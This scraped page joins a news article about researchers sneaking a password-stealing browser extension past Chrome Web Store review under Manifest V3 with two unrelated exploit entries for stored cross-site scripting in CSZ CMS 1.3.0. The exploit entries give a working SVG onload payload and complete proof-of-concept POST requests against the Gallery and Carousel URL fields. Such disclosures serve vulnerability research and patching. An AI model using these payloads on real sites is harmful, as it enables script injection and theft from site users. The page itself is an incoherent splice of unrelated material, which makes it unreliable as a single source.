On the one hand, the more access browser extensions enjoy, the more they can do and the more useful and featureful they can be. On the other hand, extensions are made by third-parties who may or may not be trustworthy, and the more access they have, the more harm they can do if they are malicious.

Google's best, most recent stab at enforcing a sensible balancing act between those two things is the Manifest V3 standard, which has also been adopted by Microsoft Edge and Mozilla Firefox.

Manifest V3 tightens up security in a number of ways, most notably by stopping extensions from downloading code from remote websites. This stops them from changing their functionality after they've been installed, which makes it easier for Google to understand what an extension does during the Chrome Web Store review process.

Although Manifest V3 makes life tougher for malicious extensions that want to steal passwords and other sensitive information, the researchers have demonstrated it's still possible to get a password-stealing extension through the review process.

> The attack is feasible because the interaction between the extensions and the web pages has not changed. The extensions can still access entire contents of the web pages, including text input fields where users may enter sensitive information such as passwords, Social Security Numbers (SSN), and Credit Card information.

The attack's success hinges on the fact that extensions have full and unfettered access to the Document Object Model (DOM) of every web page you visit. The DOM is a representation of a web page in computer memory that can be accessed and changed, allowing the page to be modified on-the-fly.

> ...when an extension is loaded onto a website, it is integrated into the DOM tree, obtaining unrestricted access to all DOM elements via the DOM APIs. This exposes a critical security issue – the lack of a security boundary between the extension and the rest of the DOM tree.

Full access to a page's DOM gives extensions tremendous power, which includes reading or modifying text input fields, like the ones you type your passwords into. The success of the researchers' technique depends on the way the page is designed, but the paper claims that most of the top 10,000 websites are vulnerable, including the likes of google.com, facebook.com, gmail.com, cloudflare.com, and amazon.com, among others.

To prove the technique was viable in the real world the researchers created a browser extension disguised as a "GPT-based assistant offering ChatGPT-like functions on websites". This allowed the extension to plausibly ask for permission to run on all websites. (It was withdrawn as soon as it passed the review process.)

Having established that it was possible for a malicious extension using these techniques to pass the review process, the researchers analysed the extensions already on the web store and found that 12.5% of them had the necessary permissions to exploit the password input field vulnerabilities, and identified 190 extensions that directly access password fields.

The researchers offer two potential fixes: A "bolt on" remedy for vulnerable sites and a "built in" remedy for browsers. The bolt on is a JavaScript library that can be added to websites to prevent unwanted access to password fields. To be successful it would need to be widely adopted and, frankly, history suggests it probably wouldn't be. The built in remedy suggests changing Chrome to alert users whenever any JavaScript function accesses any password fields. This would be no small undertaking, but seems more likely to succeed if Google can be persuaded to adopt it.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Password-stealing Chrome extension smuggled on to Web Store

CSZ CMS version 1.3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')# Date: 2023/08/18# CVE: CVE-2023-38911# Exploit Author: Daniel González# Vendor Homepage: https://www.cszcms.com/# Software Link: https://github.com/cskaza/cszcms# Version: 1.3.0# Tested on: CSZ CMS 1.3.0# Description:# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.# Steps to reproduce Stored XSS:Go to url http://localhost/admin/plugin/gallery/edit/2.When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.With the following payload we can achieve the XSSPayload:<div><p title="</div><svg/onload=alert(document.domain)>">#PoC Request:POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 140Origin: http://localhost:8080Referer: http://localhost:8080/admin/plugin/gallery/edit/2Upgrade-Insecure-Requests: 1gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )# Date: 2023/08/18# CVE: CVE-2023-38910# Exploit Author: Daniel González# Vendor Homepage: https://www.cszcms.com/# Software Link: https://github.com/cskaza/cszcms# Version: 1.3.0# Tested on: CSZ CMS 1.3.0# Description:# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.# Steps to reproduce Stored XSS:Go to url http://localhost/admin/carousel.We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.We can inject HTML code.With the following payload we can achieve the XSS.Payload:<div><p title="</div><svg/onload=alert(document.domain)>">#PoC Request:POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 137Origin: http://localhost:8080Referer: http://localhost:8080/admin/carousel/edit/3Upgrade-Insecure-Requests: 1carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

Tag

#firefox